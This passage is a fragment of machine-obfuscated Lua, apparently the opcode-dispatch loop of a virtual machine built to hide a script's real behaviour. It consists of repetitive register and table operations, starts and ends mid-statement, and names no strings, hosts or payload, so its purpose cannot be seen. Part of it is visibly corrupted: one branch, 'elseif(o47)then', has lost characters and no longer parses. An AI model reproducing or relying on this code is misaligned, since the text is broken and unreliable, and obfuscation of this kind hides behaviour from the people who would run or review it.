t=e[o];l[t](l[t+1]);for e=t,r do l[e]=nil;end;e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=e[a];e=e[n];local t=e[o];l[t](l[t+1]);for e=t,r do l[e]=nil;end;e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=e[a];e=e[n];local t=e[o];l[t](l[t+1]);for e=t,r do l[e]=nil;end;e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=e[a];e=e[n];local t=e[o];l[t](l[t+1]);for e=t,r do l[e]=nil;end;e=e[n];l[e[o]]=c[e[a]];e=e[n];e=e[n];end;elseif(i<=11)then if(i<=9)then if(i==8)then l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];e=e[n];elseif(i<=9)then l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];e=e[n];end;elseif(i==10)then l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];local c=e[o];l[c]=l[c](d(l,c+1,e[a]));for e=c+1,r do l[e]=nil;end;e=e[n];l[e[o]][e[a]]=l[e[t]];e=e[n];e=e[n];elseif(i<=11)then l[e[o]]=y(256);end;elseif(i<=13)then if(i==12)then local e=e[o];l[e]=l[e](l[e+1]);for e=e+1,r do l[e]=nil;end;elseif(i<=13)then l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];e=e[n];end;elseif(i>14)then local e=e[o];l[e]=l[e]();elseif(i<15)then l[e[o]]=c[e[a]];e=e[n];l[e[o]]=e[a];e=e[n];local i=e[o];l[i](l[i+1]);for e=i,r do l[e]=nil;end;e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];local c=e[o];local i=l[e[a]];l[c+1]=i;l[c]=i[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=y(256);e=e[n];l[e[o]][e[a]]=e[t];e=e[n];l[e[o]][e[a]]=e[t];e=e[n];l[e[o]][e[a]]=e[t];e=e[n];local o=e[o];l[o](d(l,o+1,e[a]));for e=o+1,r do l[e]=nil;end;e=e[n];e=e[n];end;elseif(i<=23)then if(i<=19)then if(i<=17)then if(i==16)then l[e[o]]=e[a];e=e[n];local i=e[o];l[i]=l[i](d(l,i+1,e[a]));for e=i+1,r do l[e]=nil;end;e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];local i=e[o];local f=l[e[a]];l[i+1]=f;l[i]=f[e[t]];e=e[n];local i=e[o];l[i](l[i+1]);for e=i,r do l[e]=nil;end;e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=c[e[a]];e=e[n];local i=e[o];local c=l[e[a]];l[i+1]=c;l[i]=c[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];local c=e[o];l[c]=l[c](d(l,c+1,e[a]));for e=c+1,r do l[e]=nil;end;e=e[n];local c=e[o];local a=l[e[a]];l[c+1]=a;l[c]=a[e[t]];e=e[n];local o=e[o];local c={l[o](l[o+1]);};local t=e[t];local a=0;for e=o,t do a=a+1;l[e]=c[a];end;for e=t+1,r do l[e]=nil;end;e=e[n];e=e[n];elseif(i<=17)then local a=e[a];local n=l[a];for e=a+1,e[t]do n=n..l[e];end;l[e[o]]=n;end;elseif(i==18)then l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];e=e[n];elseif(i<=19)then l[e[o]]=c[e[a]];end;elseif(i<=21)then if(i>20)then l[e[o]][e[a]]=e[t];elseif(i<21)then local n=e[o];l[n]=l[n](d(l,n+1,e[a]));for e=n+1,r do l[e]=nil;end;end;elseif(i==22)then l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];e=e[n];elseif(i<=23)then l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];e=e[n];end;elseif(i<=27)then if(i<=25)then if(i==24)then do return;end;elseif(i<=25)then l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];e=e[n];end;elseif(i>26)then l[e[o]]=l[e[a]];elseif(i<27)then l[e[o]]=x(D[e[a]],(nil),c);end;elseif(i<=29)then if(i==28)then local n=e[o];local a={l[n](l[n+1]);};local o=e[t];local e=0;for n=n,o do e=e+1;l[n]=a[e];end;for e=o+1,r do l[e]=nil;end;elseif(i<=29)then l[e[o]]();end;elseif(i<=30)then l[e[o]]=l[e[a]]*l[e[t]];elseif(i==31)then l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];local o=e[o];l[o](d(l,o+1,e[a]));for e=o+1,r do l[e]=nil;end;e=e[n];e=e[n];elseif(i<=32)then e=e[n];local a=e[o];h=a+s-1;for e=0,s do l[a+e]=u[e];end;for e=h+1,r do l[e]=nil;end;e=e[n];local o=e[o];do return d(l,o,h);end;e=e[n];e=e[n];end;elseif(i<=48)then if(i<=40)then if(i<=36)then if(i<=34)then if(i==33)then elseif(i<=34)then f=e[a];end;elseif(i==35)then l[e[o]]=l[e[a]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=#l[e[a]];e=e[n];local c=e[o];l[c]=l[c](d(l,c+1,e[a]));for e=c+1,r do l[e]=nil;end;e=e[n];l[e[o]]=l[e[a]][l[e[t]]];e=e[n];local c=e[o];l[c]=l[c](l[c+1]);for e=c+1,r do l[e]=nil;end;e=e[n];l[e[o]]=e[a];e=e[n];local i=e[a];local c=l[i];for e=i+1,e[t]do c=c..l[e];end;l[e[o]]=c;e=e[n];local o=e[o];l[o](d(l,o+1,e[a]));for e=o+1,r do l[e]=nil;end;e=e[n];e=e[n];elseif(i<=36)then local o=e[o];local n=l[e[a]];l[o+1]=n;l[o]=n[e[t]];end;elseif(i<=38)then if(i==37)then l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]][e[a]]=l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];e=e[n];elseif(i<=38)then l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];local i=e[o];l[i]=l[i](d(l,i+1,e[a]));for e=i+1,r do l[e]=nil;end;e=e[n];l[e[o]][e[a]]=l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];local i=e[o];local c=l[e[a]];l[i+1]=c;l[i]=c[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];local c=e[o];l[c]=l[c](d(l,c+1,e[a]));for e=c+1,r do l[e]=nil;end;e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];local c=e[o];local a=l[e[a]];l[c+1]=a;l[c]=a[e[t]];e=e[n];local o=e[o];l[o](l[o+1]);for e=o,r do l[e]=nil;end;e=e[n];e=e[n];end;elseif(i>39)then if(l[e[o]]==l[e[t]])then f=e[a];end;elseif(i<40)then l[e[o]]=l[e[a]][e[t]];end;elseif(i<=44)then if(i<=42)then if(i==41)then local n=e[o];l[n]=0+(l[n]);l[n+1]=0+(l[n+1]);l[n+2]=0+(l[n+2]);local o=l[n];local t=l[n+2];if(t>0)then if(o>l[n+1])then f=e[a];else l[n+3]=o;end;elseif(o47)then l[e[o]][e[a]]=l[e[t]];elseif(i<48)then local e=e[o];l[e](l[e+1]);for e=e,r do l[e]=nil;end;end;elseif(i<=56)then if(i<=52)then if(i<=50)then if(i>49)then local e=e[o];do return d(l,e,h);end;elseif(i<50)then l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];e=e[n];end;elseif(i>51)then if(not(l[e[o]]))then f=e[a];end;elseif(i<52)then l[e[o]]=e[a];end;elseif(i<=54)then if(i==53)then l[e[o]]=l[e[a]][l[e[t]]];elseif(i<=54)then local e=e[o];h=e+s-1;for n=0,s do l[e+n]=u[n];end;for e=h+1,r do l[e]=nil;end;end;elseif(i==55)then l[e[o]]=e[a];e=e[n];local i=e[o];l[i]=l[i](d(l,i+1,e[a]));for e=i+1,r do l[e]=nil;end;e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];local i=e[o];local f=l[e[a]];l[i+1]=f;l[i]=f[e[t]];e=e[n];local i=e[o];l[i](l[i+1]);for e=i,r do l[e]=nil;end;e=e[n];l[e[o]]=c[e[a]];e=e[n];local i=e[o];local c=l[e[a]];l[i+1]=c;l[i]=c[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];local c=e[o];l[c]=l[c](d(l,c+1,e[a]));for e=c+1,r do l[e]=nil;end;e=e[n];local c=e[o];local i=l[e[a]];l[c+1]=i;l[c]=i[e[t]];e=e[n];local t=e[o];l[t]=l[t](l[t+1]);for e=t+1,r do l[e]=nil;end;e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=#l[e[a]];e=e[n];l[e[o]]=e[a];e=e[n];e=e[n];elseif(i<=56)then local n=e[o];local t=l[n+2];local o=l[n]+t;l[n]=o;if(t>0)then if(o<=l[n+1])then f=e[a];l[n+3]=o;end;elseif(o>=l[n+1])then f=e[a];l[n+3]=o;end;end;elseif(i<=60)then if(i<=58)then if(i==57)then 